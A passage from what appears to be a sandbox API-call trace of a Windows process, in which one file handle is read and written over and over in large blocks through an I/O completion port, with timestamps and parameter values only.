lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.546] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.548] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.549] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.549] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.550] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.552] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.553] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.553] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.563] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.564] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.566] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.566] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.567] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.569] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.570] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.570] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.580] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.581] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.583] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.583] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.601] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.603] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.604] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.604] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.622] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.623] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.624] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.624] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.637] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.638] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.640] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.640] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.662] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.663] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.665] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.665] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.666] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.668] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.669] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.669] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.687] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.689] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.690] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.690] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.691] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.695] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.696] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.697] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.706] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.707] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.709] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.709] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.710] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.724] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.726] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.726] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.744] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.746] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.747] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.747] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.749] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.750] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.751] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.751] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.769] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.771] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.772] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.772] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.778] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.780] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.781] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.781] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.799] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.801] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.802] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.802] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.803] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.805] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.806] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.806] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.825] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.827] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.828] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.828] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.830] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.831] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.832] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.832] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.855] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.856] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.858] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.858] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, 